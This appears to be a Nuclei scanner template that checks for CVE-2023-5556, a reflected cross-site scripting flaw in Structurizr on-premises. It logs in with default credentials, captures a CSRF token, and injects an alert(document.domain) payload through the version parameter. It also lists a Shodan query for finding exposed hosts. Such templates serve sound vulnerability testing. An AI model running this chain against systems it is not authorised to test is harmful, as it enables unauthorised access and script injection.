nuclei-templates/http/cves/2023/CVE-2023-5556.yaml

id: CVE-2023-5556

info:
  name: Structurizr on-premises - Cross Site Scripting
  author: shankaracharya
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository structurizr/onpremises prior to 3194.    
  remediation: |
    Apply the latest security patches or updates provided by Structurizr to fix the XSS vulnerability.    
  reference:
    - https://huntr.com/bounties/a3ee0f98-6898-41ae-b1bd-242a03a73d1b/
    - https://github.com/structurizr/onpremises/commit/6cff4f792b010dfb1ff6a0b4ae1c6e398f8f8a18
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-5556
    cwe-id: CWE-79
    epss-score: 0.00064
    epss-percentile: 0.26129
    cpe: cpe:2.3:a:structurizr:on-premises_installation:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: structurizr
    product: on-premises_installation
    shodan-query: http.favicon.hash:1199592666
  tags: cve,cve2023,xss,structurizr,oos,authenticated

variables:
  str: "{{randstr}}"

http:
  - raw:
      - |
        GET /signin HTTP/1.1
        Host: {{Hostname}}        

      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&_csrf={{csrf}}&hash=        

      - |
        GET /dashboard HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded        

      - |
        GET /workspace/create HTTP/1.1
        Host: {{Hostname}}        

      - |
        GET /workspace/{{workspace}}/?version={{str}}%22);alert(document.domain);// HTTP/1.1
        Host: {{Hostname}}        

    attack: pitchfork
    payloads:
      username:
        - "structurizr"
      password:
        - "password"

    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '<a href="/dashboard">'
          - 'Sign out'
        condition: and

      - type: word
        part: body_5
        words:
          - '");alert(document.domain);//'
          - 'Structurizr'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="([0-9a-z-]+)"'
        internal: true

      - type: regex
        name: workspace
        group: 1
        part: header
        regex:
          - '\/workspace\/([0-9]+)\?scriptNonce='
        internal: true
# digest: 4a0a00473045022016c9116f5d08d434ce63ecbeba018da6e0eda0406d850137ee0484bb78ab66c0022100a54b3fecb6fb2faa1f50ebd5b81530b98efb8d0338ab7ec8716bc2861992c836:922c64590222798bb761d5b6d8e72950